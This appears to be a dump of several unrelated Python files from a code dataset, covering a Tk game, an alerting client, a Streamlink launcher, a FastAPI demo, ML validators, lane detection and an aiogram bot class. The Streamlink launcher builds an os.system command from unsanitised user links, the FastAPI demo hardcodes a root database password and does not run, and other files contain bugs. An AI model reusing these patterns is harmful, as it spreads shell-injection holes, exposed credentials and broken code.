canvas.create_line(0, i * step_y, size_canas_x, i * step_y)\n for i in range(0, s_y + 1):\n canvas.create_line(i * step_y, 0, i * step_y, size_canas_y)\n\n\npoints = []\ndraw_table()\n\n\nclass Point:\n def __init__(self, x, y, type):\n self.x = x\n self.y = y\n self.type = type\n\n def __str__(self):\n return str(self.__class__) + \":\" + str(self.__dict__)\n\n\ndef draw_point(x, y, type):\n size = 25\n color = \"black\"\n if type == 0:\n color = \"red\"\n if type == 1:\n color = \"blue\"\n print(type)\n #id = canvas.create_oval(x * step_x, y * step_y, x * step_x + step_x, y * step_y + step_y, fill=color)\n\n\ndef add_to_points(event):\n print(event.num, event.x, event.y, type)\n type = 0\n if event.num == 3:\n type = 1\n points.append(Point(event.x // step_x, event.y // step_x, type))\n draw_point(event.x, event.y, type)\n print(\"\".join(map(str, points)))\n\n\ncanvas.bind_all(\"Button-1\", add_to_points)\ncanvas.bind_all(\"Button-1\", add_to_points)\n\nwhile app_runimg:\n if app_runimg:\n tk.update_idletasks()\n tk.update()\ntime.sleep(0.005)\n","repo_name":"vyky1983/Python","sub_path":"game/frest_game.py","file_name":"frest_game.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71709933547","text":"from typing import Optional\n\nimport requests\nimport structlog # type: ignore\nfrom flask import current_app, has_request_context\n\nlogger = structlog.get_logger(__name__)\n\n\nclass VictorOpsClient:\n def __init__(self, url: str, routing_key: str):\n self.alert_url = f\"{url}/{routing_key}\"\n\n @classmethod\n def get(cls) -> \"VictorOpsClient\":\n \"\"\"\n Get a configured VictorOps client from the Flask app config\n \"\"\"\n return current_app.config[\"victor_ops_client\"]\n\n def _alert(\n self,\n message_type: str,\n entity_id: str,\n entity_display_name: Optional[str] = None,\n state_message: Optional[str] = None,\n ):\n return requests.post(\n self.alert_url,\n data=dict(\n message_type=message_type,\n entity_id=entity_id,\n entity_display_name=entity_display_name,\n state_message=state_message,\n ),\n )\n\n def critical(\n self,\n entity_id: str,\n entity_display_name: Optional[str] = None,\n state_message: Optional[str] = None,\n ):\n return self._alert(\"CRITICAL\", entity_id, entity_display_name, state_message)\n\n def warning(\n self,\n entity_id: str,\n entity_display_name: Optional[str] = None,\n state_message: Optional[str] = None,\n ):\n return self._alert(\"WARNING\", entity_id, entity_display_name, state_message)\n\n def ack(\n self,\n entity_id: str,\n entity_display_name: Optional[str] = None,\n state_message: Optional[str] = None,\n ):\n return self._alert(\n \"ACKNOWLEDGEMENT\", entity_id, entity_display_name, state_message\n )\n\n def info(\n self,\n entity_id: str,\n entity_display_name: Optional[str] = None,\n state_message: Optional[str] = None,\n ):\n return self._alert(\"INFO\", entity_id, entity_display_name, state_message)\n","repo_name":"clohr/model-service","sub_path":"core/clients/victor_ops.py","file_name":"victor_ops.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16066203522","text":"import tkinter as tk\nfrom tkinter import BOTH, BOTTOM, LEFT, RIGHT, TOP, X, Y, Frame, Label, Listbox, ttk\nfrom tkinterdnd2 import *\nimport os\n\nclass App(TkinterDnD.Tk):\n def __init__(self):\n super().__init__()\n\n # create the self window\n self.title('StreamlinkTk')\n self.geometry('330x450')\n self.resizable(True, True)\n self.config(bg=\"#222222\")\n \n if os.name == \"nt\":\n self.option_add('*Font', 'Arial 12')\n else:\n self.option_add('*Font', 'Arial 17')\n\n self.frame = Frame(self)\n self.frame.pack()\n\n self.bottomframe = Frame(self)\n self.bottomframe.pack( side = BOTTOM )\n\n # listbox def\n self.listbox = tk.Listbox(self.frame, height=16, width=30, selectmode='single')\n self.listbox.config(bg='#222222', fg=\"#EEEEEE\")\n self.listbox.pack(pady=10, side= LEFT)\n\n self.listbox.bind('<>',lambda event:items_selected(event))\n\n # link a scrollbar to a list\n self.scrollbar = ttk.Scrollbar(self.frame, orient='vertical')\n self.scrollbar.pack(side=RIGHT, fill=Y)\n self.listbox.configure(yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.listbox.yview)\n\n # drag n drop label\n self.label = Label(self.bottomframe, width=30, text=\"drag and drop\")\n self.label.pack(padx=5, pady=5, fill=X)\n \n def dropEvent(event):\n if event.data:\n # self.label.configure(text=event.data)\n retrieve_input(event.data)\n return event.action\n\n self.drop_target_register(DND_TEXT)\n self.dnd_bind('<>', dropEvent)\n\n # textbox def\n self.textBox=tk.Entry(self.bottomframe)\n self.textBox.bind('',lambda event:retrieve_input(self.textBox.get()))\n self.textBox.bind('',lambda event:Paste())\n self.textBox.pack(padx=10, side= LEFT)\n \n # button def\n self.buttonCommit=tk.Button(self.bottomframe, text=\"Commit\", command=lambda:retrieve_input(self.textBox.get()))\n self.buttonCommit.pack(padx=10, side= LEFT)\n \n # load links\n filetxt = open('links.txt', 'r')\n liste = filetxt.readlines()\n filetxt.close()\n\n # populate listbox\n for item in liste:\n itemr = item.replace(\"\\n\", \"\")\n self.listbox.insert(tk.END, itemr)\n \n # retrieve textbox text\n def retrieve_input(widg):\n # widg=widg \n # print(widg)\n self.textBox.delete(0, tk.END)\n self.listbox.insert(tk.END, widg + '\\n')\n with open('links.txt', 'a') as f:\n f.write(widg + '\\n')\n f.close()\n\n # paste when R-click\n def Paste():\n self.textBox.event_generate('<>')\n retrieve_input(self.textBox.get())\n\n # click link\n def items_selected(event):\n indexLb = event.widget.curselection()\n link = event.widget.get(indexLb).replace(\"\\n\", \"\")\n commandsl(link)\n\n # Send link to streamlink\n def commandsl(link): \n command = \"streamlink \" + link + \" best\"\n print(command)\n res = os.system(command)\n\n\nif __name__ == \"__main__\":\n app = App()\n\n app.mainloop()","repo_name":"ishbutz/pysltk","sub_path":"pysltkv3.py","file_name":"pysltkv3.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26672704047","text":"from typing import List\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom sqlalchemy.ext.asyncio import create_async_engine\n\nimport sqlalchemy\n\nhost = \"localhost\"\ndb_adapter = \"+asyncmy\"\n# db_adapter = \"+pymysql\"\n# db_adapter = \"\"\nport = 3306\nusername = \"root\"\npassword = \"jhlee1324\"\ndatabase_name = \"soron\"\nDATABASE_URL = (\n f\"mysql{db_adapter}://{username}:{password}@{host}:{port}/{database_name}\"\n)\n\n# database = databases.Database(DATABASE_URL)\n\nmetadata = sqlalchemy.MetaData()\n\nnotes = sqlalchemy.Table(\n \"notes\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.Integer, primary_key=True),\n sqlalchemy.Column(\"text\", sqlalchemy.String),\n sqlalchemy.Column(\"completed\", sqlalchemy.Boolean),\n)\n\nasync_engine, async_db_session = create_async_engine(DATABASE_URL)\n# engine = sqlalchemy.create_engine(\n# DATABASE_URL, connect_args={\"check_same_thread\": False}\n# )\n# metadata.create_all(engine)\n\n\nclass NoteIn(BaseModel):\n text: str\n completed: bool\n\n\nclass Note(BaseModel):\n id: int\n text: str\n completed: bool\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n@app.get(\"/notes/\", response_model=List[Note])\nasync def read_notes():\n query = notes.select()\n return await database.fetch_all(query)\n\n\n@app.post(\"/notes/\", response_model=Note)\nasync def create_note(note: NoteIn):\n query = notes.insert().values(text=note.text, completed=note.completed)\n last_record_id = await database.execute(query)\n return {**note.dict(), \"id\": last_record_id}\n","repo_name":"dople1227/fastAPI-Vue-docker","sub_path":"services/backend/seminar/seminar_async/dbtest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4223957338","text":"import torch\n\nfrom .diversity_validator import DiversityValidator\nfrom .entropy_validator import EntropyValidator\nfrom .multiple_validators import MultipleValidators\n\n\nclass IMValidator(MultipleValidators):\n \"\"\"\n The sum of [EntropyValidator][pytorch_adapt.validators.EntropyValidator]\n and [DiversityValidator][pytorch_adapt.validators.DiversityValidator]\n \"\"\"\n\n def __init__(self, weights=None, **kwargs):\n self.layer = kwargs.pop(\"layer\", None)\n inner_kwargs = {} if not self.layer else {\"layer\": self.layer}\n validators = {\n \"entropy\": EntropyValidator(**inner_kwargs),\n \"diversity\": DiversityValidator(**inner_kwargs),\n }\n super().__init__(validators=validators, weights=weights, **kwargs)\n\n\nclass IMCombinedValidator(IMValidator):\n \"\"\"\n The sum of [EntropyValidator][pytorch_adapt.validators.EntropyValidator]\n and [DiversityValidator][pytorch_adapt.validators.DiversityValidator]\n \"\"\"\n\n def __init__(self, weights=None, **kwargs):\n super().__init__(weights=weights, **kwargs)\n\n def __call__(self, src_train, target_train):\n if self.layer is None:\n combined = {\"logits\": torch.cat([src_train[\"logits\"], target_train[\"logits\"]])}\n else:\n combined = {self.layer: torch.cat([src_train[self.layer], target_train[self.layer]])}\n return super().__call__(target_train=combined)\n","repo_name":"linusericsson/better-da","sub_path":"src/pytorch_adapt/validators/im_validator.py","file_name":"im_validator.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8767181729","text":"'''\n流程:\n1. 高斯模糊 fin\n2. 轉灰階 fin\n3. 轉鳥瞰 fin\n4. 轉黑白 fin\n5. 找左右兩邊的白色點 fin (看起來沒問題拉應該,不過如果找不到第一個高度上的點的畫高機率全都找不到,然後都是迴圈效率很差但我不知道怎麼矩陣化)\n6. 用5的點(如果一邊有3個點以上)建構 y = ax^2+bx+c 的matrix去解並得到曲線 fin\n7. 把線畫上去然後轉回飛鳥瞰的視角然後把線貼上元照片\n'''\nimport cv2\nimport os\nimport numpy as np\nimport copy\nfrom scipy.optimize import curve_fit\nimport time\nimport warnings\nfrom tqdm import tqdm\n\n'''\nreturn the vertices of ROI\n'''\ndef get_vertices(image):\n return np.float32([[200, 720],[1100, 720],[595, 450],[685, 450]])\n\n# 轉成鳥瞰視角\ndef overhead(transform_h,transform_w,img):\n source = np.float32(get_vertices(img))\n destination = np.float32([[300,720],[980,720],[300,0],[900,0]])\n overhead_transform = cv2.getPerspectiveTransform(source, destination)\n overhead_img = cv2.warpPerspective(img, overhead_transform, dsize=(transform_w, transform_h),flags=cv2.INTER_LINEAR)\n\n return overhead_img\n\n'''\nUnwarped the image from overhead to original perspective\n'''\ndef unoverhead(transform_h,transform_w,img):\n source = np.float32(get_vertices(img))\n destination = np.float32([[300,720],[980,720],[300,0],[900,0]])\n overhead_transform = cv2.getPerspectiveTransform(destination,source)\n overhead_img = cv2.warpPerspective(img, overhead_transform, dsize=(transform_w, transform_h),flags=cv2.INTER_LINEAR)\n\n return overhead_img\n\n'''\nbinarize the image to black and white to separate the lane from road\n'''\ndef binary(img):\n sort = np.sort(img.flatten())\n mid = sort[[int(720*1280*0.5)]]\n top = sort[[int(720*1280*0.9)]]\n thres = int(mid+top/2)\n binary_img = cv2.threshold(img,thres,255,cv2.THRESH_BINARY)[1]\n\n return binary_img\n\n# 用類似window的方式找白色(白色等於在Lane上)\ndef find_line_points(img):\n win_h = int(img.shape[0]/10) # window高度\n win_w = 200 # window寬度\n half_range = int(win_w/2)\n\n flag_left = 0 # flag == 0 :還沒找到白色 ; flag == 1 找到第一個白色 ; flag == 2 找到最後一個白色並算出中間點\n flag_right = 0\n\n left_1 = 0 # 左線第一個白色\n left_2 = 0 # 左線最後一個白色\n right_1 = 0\n right_2 = 0\n\n left_mid = 333 # left_1 left_2 他倆中間\n right_mid = 1013\n\n left_points = [] # 左邊的點的集合 ; 0 代表沒有找到白色點,其他值代表該點x座標\n right_points = []\n\n # 跑最底下第一條線(第一個高度)找到左右邊第一個點\n for i in range(640):\n if img[720-win_h][i] == 255 and flag_left == 0:\n flag_left = 1\n left_1 = i\n elif img[720-win_h][i] == 0 and flag_left == 1:\n flag_left = 2\n left_2 = i\n \n if img[720-win_h][1279-i] == 255 and flag_right == 0:\n flag_right = 1\n right_1 = i\n elif img[720-win_h][1279-i] == 0 and flag_right == 1:\n flag_right = 2\n right_2 = i\n \n if flag_right == 2 and flag_left == 2:break\n\n if flag_left == 2:\n left_mid = left_1 + int((left_2-left_1)/2)\n left_points.append(left_mid)\n else:\n left_points.append(0)\n if flag_right == 2:\n right_mid = 1280 - (right_2 + int((right_1-right_2)/2))\n right_points.append(right_mid)\n else:\n right_points.append(0)\n\n flag_left = 0\n flag_right = 0\n\n # 跑其他8個高度\n for i in range(8):\n for j in range(win_w):\n current_L = img[720-win_h*(i+2)][left_mid-half_range+j]\n current_R = img[720-win_h*(i+2)][right_mid-half_range+j]\n\n if current_L == 255 and flag_left == 0:\n flag_left = 1\n left_1 = j\n elif current_L == 0 and flag_left == 1:\n flag_left = 2\n left_2 = j\n \n if current_R == 255 and flag_right == 0:\n flag_right = 1\n right_1 = j\n elif current_R == 0 and flag_right == 1:\n flag_right = 2\n right_2 = j\n\n if right_mid > 1280 - half_range - 5:right_mid = 1280 - half_range - 5\n\n if flag_left == 2:\n left_mid = left_mid - half_range + left_1 + int((left_2-left_1)/2)\n left_points.append(left_mid)\n else:\n left_points.append(0)\n if flag_right == 2:\n right_mid = right_mid - half_range + right_2 + int((right_1-right_2)/2)\n right_points.append(right_mid)\n else:\n right_points.append(0)\n\n flag_left = 0\n flag_right = 0\n\n return left_points,right_points\n\n'''\nthe formula of the curve\n'''\ndef func(x, a, b, c):\n return a * x**2 + b * x + c\n\n'''\nfind the parameters of the curve of given edge points\n'''\ndef fit_curve(points):\n xdata = []\n ydata = []\n flag = 0\n last_1 = [0,0]\n last_2 = [0,0]\n for i in range(9):\n if points[i] != 0:\n xdata.append(points[i])\n ydata.append(720 - int(720 * (i+1) / 10))\n if flag == 0:\n last_1 = [720 - int(720 * (i+1) / 10),points[i]]\n flag = 1\n else:\n last_2 = last_1\n last_1 = [720 - int(720 * (i+1) / 10),points[i]]\n flag = 2\n # fake point\n if flag == 2:\n fake_x = int((last_1[0]*last_2[1] - last_2[0]*last_1[1])/(last_1[0] - last_2[0]))\n xdata.append(fake_x)\n ydata.append(0)\n delta_x = xdata[0] - xdata[1]\n delta_y = ydata[0] - ydata[1]\n fake_x = int((800 - ydata[0]) * (delta_x / delta_y) + xdata[0])\n xdata.insert(0, fake_x)\n ydata.insert(0, 800 - 1)\n popt, _ = curve_fit(func, xdata, ydata)\n return popt,xdata\n else:\n return 0,[]\n\n'''\nplot the lane line on the binary image\n'''\ndef generate_line_image(binary_img):\n line_img = np.zeros((720,1280), np.uint8)\n\n left_points,right_points = find_line_points(binary_img)\n left_popt,xdata = fit_curve(left_points)\n xlimit = 0\n xmin = 0\n if len(xdata) >= 3:\n xlimit = np.max(xdata)\n xmin = np.min(xdata)\n left_x = np.linspace(xmin, xlimit, 100)\n left_y = func(left_x, *left_popt)\n cv2.polylines(line_img, pts=[np.array([*zip(left_x, left_y)], np.int32)], isClosed=False, color=255, thickness=15)\n\n right_popt,xdata = fit_curve(right_points)\n if len(xdata) >= 3:\n xlimit = np.max(xdata)\n xmin = np.min(xdata)\n right_x = np.linspace(xmin, xlimit, 100)\n right_y = func(right_x, *right_popt)\n cv2.polylines(line_img, pts=[np.array([*zip(right_x, right_y)], np.int32)], isClosed=False, color=255, thickness=15)\n\n return line_img\n\ndef draw_line(img):\n img = cv2.resize(img,(1280,720), interpolation=cv2.INTER_AREA)\n img_copy = copy.deepcopy(img)\n img = cv2.GaussianBlur(img, (5,5), 0)\n grayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n overhead_img = overhead(720,1280,grayscale_img)\n binary_img = binary(overhead_img)\n\n line_img = generate_line_image(binary_img)\n\n line_img = unoverhead(720,1280,line_img)\n foreground = np.zeros((img_copy.shape), np.uint8)\n foreground[:, :, 2] = line_img\n background = cv2.bitwise_and(img_copy, img_copy, mask=cv2.bitwise_not(line_img))\n img = cv2.bitwise_or(foreground, background)\n\n #cv2.imshow('img',img)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n #cv2.imwrite(os.path.join('results', 'solidWhiteRight_result.jpg'), img)\n\n return img\n\nif __name__ == '__main__':\n #img = cv2.imread(os.path.join('datasets', 'solidWhiteRight.jpg'))\n #draw_line(img)\n cap = cv2.VideoCapture(os.path.join('datasets', 'project_video.mp4'))\n video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n out = cv2.VideoWriter(os.path.join('results', 'project_video_result.mp4'), fourcc, fps, (w, h))\n \n start_time = time.time()\n for i in tqdm(range(video_length)):\n if cap.isOpened():\n ret, img = cap.read()\n if not ret:\n break\n img = draw_line(img)\n out.write(img)\n\n end_time = time.time()\n print('Spend {:.3f} second.'.format(end_time - start_time))\n cap.release()\n out.release()","repo_name":"cindy203cc/CV_final","sub_path":"advanced_video.py","file_name":"advanced_video.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32270289983","text":"\"\"\"\nTien xu ly du lieu cua retail rocket data\n\"\"\"\n\nimport csv\nimport logging\nimport subprocess\n\nfrom src import settings\nfrom src.data_preparation import data_preparation, sparse_vector\n\n# config log\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\ndata_name = \"retail_rocket/\"\nroot_path = settings.DATA_ROOT_PATH + \"site_data/\" + data_name\n\n\ndef gen_cleaned_data(input_file, cleaned_implicit_data_path, cleaned_explicit_data_path):\n logging.info('Gen raw data')\n\n implicit_output = open(cleaned_implicit_data_path, 'w')\n explicit_output = open(cleaned_explicit_data_path, 'w')\n csv_writer_implicit = csv.writer(implicit_output, delimiter=',', quotechar='', quoting=csv.QUOTE_NONE)\n csv_writer_explicit = csv.writer(explicit_output, delimiter=',', quotechar='', quoting=csv.QUOTE_NONE)\n\n with open(input_file, 'r') as file:\n csv_reader = csv.reader(file, delimiter=',', quotechar='', quoting=csv.QUOTE_NONE)\n line = next(csv_reader) # skip header\n for line in csv_reader:\n timestamp = line[0]\n raw_uid = line[1]\n event = line[2]\n raw_item_id = line[3]\n csv_writer_implicit.writerow([raw_uid, raw_item_id, timestamp])\n if (event == 'transaction') or (event == 'addtocart'):\n csv_writer_explicit.writerow([raw_uid, raw_item_id, timestamp])\n # ghi tat ca interact vao file implicit de loai bo black list user cho chinh xac\n\n implicit_output.close()\n explicit_output.close()\n\n\ndef construct_pcat_repr():\n with open(root_path + 'i2index.txt') as f:\n active_item_list = [line.split(',')[0] for line in f]\n print(len(active_item_list))\n\n item_dict = {}\n with open(root_path + 'i2pcat.txt') as f:\n for line in f:\n item_id, pcat = line.split(',')\n if item_id not in item_dict:\n item_dict[item_id] = [int(pcat)]\n else:\n item_dict[item_id].append(int(pcat))\n print(len(item_dict))\n cat2parent = {}\n max_cat = 0\n with open(root_path + 'raw_data/category_tree.csv', newline='') as f:\n next(f)\n for line in f:\n cat, parent = line.strip().split(',')\n cat = int(cat)\n if cat > max_cat:\n max_cat = cat\n if parent != '':\n parent = int(parent)\n if parent > max_cat:\n max_cat = parent\n cat2parent[cat] = parent\n if 231 in cat2parent:\n print('huhu')\n with open(root_path + 'item_repr.txt', 'w') as f:\n f.write(str(max_cat + 1) + '\\n')\n csv_writer = csv.writer(f, delimiter=',', quotechar='|', quoting=csv.QUOTE_ALL)\n for item_id in item_dict:\n sp_vec = banner_cats_to_vector(item_dict[item_id], cat2parent)\n sp_repr = sparse_vector.dict_sparse_vector_to_json_string(sp_vec)\n csv_writer.writerow((item_id, sp_repr))\n print('Done infer pcat repr of retail_rocket items !')\n\n\ndef banner_cats_to_vector(cats, cat_to_parent_cat):\n sv = {}\n for cat in cats:\n sv[cat] = 1.0\n while cat in cat_to_parent_cat:\n cat = cat_to_parent_cat[cat]\n sv[cat] = 1.0\n banner_spare_vector = sparse_vector.normalize(sv)\n return banner_spare_vector\n\n\ndef main():\n # data_path = settings.DATA_ROOT_PATH + \"site_data/\" + data_name + \"/raw_data/events_purchase.csv\"\n data_path = root_path + 'raw_data/new_events.csv'\n\n cleaned_implicit_data_path = root_path + '_implicit.clean.txt'\n cleaned_explicit_data_path = root_path + '_explicit.clean.txt'\n\n user_index_dict = root_path + 'u2index.txt'\n item_index_dict = root_path + 'i2index.txt'\n combined_data = root_path + 'ratings.txt'\n output_root_name = root_path + 'scene_1/'\n\n # # Tao ra implicit va explicit file\n # gen_cleaned_data(data_path, cleaned_implicit_data_path, cleaned_explicit_data_path)\n # logging.info('--> Done, gen_cleaned_data')\n\n # # Danh lai so thu tu cho user, item, cac user co tuong tac trong file implicit < 5 bi loai\n # # Tao du lieu co explicit chac chan se co implicit\n # data_preparation.gen_ratings_data_with_explicit(cleaned_implicit_data_path, cleaned_explicit_data_path,\n # user_index_dict, item_index_dict, combined_data)\n # logging.info('--> Done, gen_ratings_data_with_explicit')\n #\n # # div train test data with explicit\n # data_preparation.div_train_test_data_with_explicit(combined_data, output_root_name)\n # logging.info('--> Done, div_train_test_data_with_explicit')\n\n subprocess.call(['bash', 'bin/split.sh', output_root_name])\n logging.info(\"--> Done, split_train_data_into_partition\")\n\n\nif __name__ == '__main__':\n main()\n # construct_pcat_repr()\n","repo_name":"tranquyenbk173/BERT_ITE","sub_path":"src/data_preparation/retailrocket_data.py","file_name":"retailrocket_data.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"3058592849","text":"# NIM/Nama\t \t: 16520002/Eraraya Morenzo Muten\n# Tanggal\t \t : 17 November 2020\n# Kelas \t : 16\n# Deskripsi\t\t : Subprogram yang mencetak indeks dan isi array\n \n\n# Latihan 5\n\n# Program Cetak Array\n\n# KAMUS GLOBAL\n# N : integer\n# T : array\n\n#ALGORITMA\ndef CetakArray(jmlh, array): # fungsi CetakArray akan membutuhkan dua parameter \n\n # KAMUS LOKAL PROSEDUR\n # jmlh : integer\n # array : array\n\n # ALGORITMA PROSEDUR\n for i in range(jmlh): # melakukan perulangan sebanyak N\n print(\"[\"+str(i)+\"] \"+str(array[i])) # cetak tiap indeks dan isi elemen\n\n# ALGORITMA GLOBAL\nN = int(input(\"Masukkan nilai N: \")) # deklarasi variabel N sebagai panjang array\nT = [0 for i in range(N)] # deklarasi variabel T sebagai array\n\nfor i in range(N): # lakukan perulangan sebanyak N untuk mengisi array\n T[i]=int(input(\"Masukkan elemen ke-\"+str(i)+\": \")) # isi elemen array sesuai dengan input pengguna\n\nCetakArray(N, T) # jalankan fungsi CetakArray dengan parameter N dan T","repo_name":"morenzoe/KU1102_Introduction_to_Computation","sub_path":"Daily_Assignments/Function/Latihan_Prosedur.py","file_name":"Latihan_Prosedur.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37387256202","text":"import asyncio\nimport contextlib\nimport io\nimport os\nimport pathlib\nimport ssl\nimport typing\nimport warnings\nfrom contextvars import ContextVar\nfrom typing import Dict, List, Optional, Union, Type\n\nimport aiohttp\nimport certifi\nfrom aiohttp.helpers import sentinel\n\nfrom . import api\nfrom .api import TelegramAPIServer, TELEGRAM_PRODUCTION\nfrom ..types import ParseMode, base\nfrom ..utils import json\nfrom ..utils.auth_widget import check_integrity\nfrom ..utils.deprecated import deprecated\n\n\nclass BaseBot:\n \"\"\"\n Base class for bot. It's raw bot.\n \"\"\"\n _ctx_timeout = ContextVar('TelegramRequestTimeout')\n _ctx_token = ContextVar('BotDifferentToken')\n\n def __init__(\n self,\n token: base.String,\n loop: Optional[Union[asyncio.BaseEventLoop, asyncio.AbstractEventLoop]] = None,\n connections_limit: Optional[base.Integer] = None,\n proxy: Optional[base.String] = None,\n proxy_auth: Optional[aiohttp.BasicAuth] = None,\n validate_token: Optional[base.Boolean] = True,\n parse_mode: typing.Optional[base.String] = None,\n disable_web_page_preview: Optional[base.Boolean] = None,\n timeout: typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]] = None,\n server: TelegramAPIServer = TELEGRAM_PRODUCTION\n ):\n \"\"\"\n Instructions how to get Bot token is found here: https://core.telegram.org/bots#3-how-do-i-create-a-bot\n\n :param token: token from @BotFather\n :type token: :obj:`str`\n :param loop: event loop\n :type loop: Optional Union :obj:`asyncio.BaseEventLoop`, :obj:`asyncio.AbstractEventLoop`\n :param connections_limit: connections limit for aiohttp.ClientSession\n :type connections_limit: :obj:`int`\n :param proxy: HTTP proxy URL\n :type proxy: :obj:`str`\n :param proxy_auth: Authentication information\n :type proxy_auth: Optional :obj:`aiohttp.BasicAuth`\n :param validate_token: Validate token.\n :type validate_token: :obj:`bool`\n :param parse_mode: You can set default parse mode\n :type parse_mode: :obj:`str`\n :param disable_web_page_preview: You can set default disable web page preview parameter\n :type disable_web_page_preview: :obj:`bool`\n :param timeout: Request timeout\n :type timeout: :obj:`typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]]`\n :param server: Telegram Bot API Server endpoint.\n :type server: :obj:`TelegramAPIServer`\n :raise: when token is invalid throw an :obj:`aiogram.utils.exceptions.ValidationError`\n \"\"\"\n self._main_loop = loop\n\n # Authentication\n if validate_token:\n api.check_token(token)\n self._token = None\n self.__token = token\n self.id = int(token.split(sep=':')[0])\n self.server = server\n\n self.proxy = proxy\n self.proxy_auth = proxy_auth\n\n # aiohttp main session\n ssl_context = ssl.create_default_context(cafile=certifi.where())\n\n self._session: Optional[aiohttp.ClientSession] = None\n self._connector_class: Type[aiohttp.TCPConnector] = aiohttp.TCPConnector\n self._connector_init = dict(limit=connections_limit, ssl=ssl_context)\n\n if isinstance(proxy, str) and (proxy.startswith('socks5://') or proxy.startswith('socks4://')):\n from aiohttp_socks import SocksConnector\n from aiohttp_socks.utils import parse_proxy_url\n\n socks_ver, host, port, username, password = parse_proxy_url(proxy)\n if proxy_auth:\n if not username:\n username = proxy_auth.login\n if not password:\n password = proxy_auth.password\n\n self._connector_class = SocksConnector\n self._connector_init.update(\n socks_ver=socks_ver, host=host, port=port,\n username=username, password=password, rdns=True,\n )\n self.proxy = None\n self.proxy_auth = None\n\n self._timeout = None\n self.timeout = timeout\n\n self.parse_mode = parse_mode\n\n self.disable_web_page_preview = disable_web_page_preview\n\n async def get_new_session(self) -> aiohttp.ClientSession:\n return aiohttp.ClientSession(\n connector=self._connector_class(**self._connector_init),\n json_serialize=json.dumps\n )\n\n @property\n def loop(self) -> Optional[asyncio.AbstractEventLoop]:\n return self._main_loop\n\n async def get_session(self) -> Optional[aiohttp.ClientSession]:\n if self._session is None or self._session.closed:\n self._session = await self.get_new_session()\n\n if not self._session._loop.is_running(): # NOQA\n # Hate `aiohttp` devs because it juggles event-loops and breaks already opened session\n # So... when we detect a broken session need to fix it by re-creating it\n # @asvetlov, if you read this, please no more juggle event-loop inside aiohttp, it breaks the brain.\n await self._session.close()\n self._session = await self.get_new_session()\n\n return self._session\n\n @property\n @deprecated(\n reason=\"Client session should be created inside async function, use `await bot.get_session()` instead\",\n stacklevel=3,\n )\n def session(self) -> Optional[aiohttp.ClientSession]:\n return self._session\n\n @staticmethod\n def _prepare_timeout(\n value: typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]]\n ) -> typing.Optional[aiohttp.ClientTimeout]:\n if value is None or isinstance(value, aiohttp.ClientTimeout):\n return value\n return aiohttp.ClientTimeout(total=value)\n\n @property\n def timeout(self):\n timeout = self._ctx_timeout.get(self._timeout)\n if timeout is None:\n return sentinel\n return timeout\n\n @timeout.setter\n def timeout(self, value):\n self._timeout = self._prepare_timeout(value)\n\n @timeout.deleter\n def timeout(self):\n self.timeout = None\n\n @contextlib.contextmanager\n def request_timeout(self, timeout: typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]):\n \"\"\"\n Context manager implements opportunity to change request timeout in current context\n\n :param timeout: Request timeout\n :type timeout: :obj:`typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]]`\n :return:\n \"\"\"\n timeout = self._prepare_timeout(timeout)\n token = self._ctx_timeout.set(timeout)\n try:\n yield\n finally:\n self._ctx_timeout.reset(token)\n\n @property\n def __token(self):\n return self._ctx_token.get(self._token)\n\n @__token.setter\n def __token(self, value):\n self._token = value\n\n @contextlib.contextmanager\n def with_token(self, bot_token: base.String, validate_token: Optional[base.Boolean] = True):\n if validate_token:\n api.check_token(bot_token)\n token = self._ctx_token.set(bot_token)\n try:\n yield\n finally:\n self._ctx_token.reset(token)\n\n @deprecated(\"This method's behavior will be changed in aiogram v3.0. \"\n \"More info: https://core.telegram.org/bots/api#close\", stacklevel=3)\n async def close(self):\n \"\"\"\n Close all client sessions\n \"\"\"\n if self._session:\n await self._session.close()\n\n async def request(self, method: base.String,\n data: Optional[Dict] = None,\n files: Optional[Dict] = None, **kwargs) -> Union[List, Dict, base.Boolean]:\n \"\"\"\n Make an request to Telegram Bot API\n\n https://core.telegram.org/bots/api#making-requests\n\n :param method: API method\n :type method: :obj:`str`\n :param data: request parameters\n :type data: :obj:`dict`\n :param files: files\n :type files: :obj:`dict`\n :return: result\n :rtype: Union[List, Dict]\n :raise: 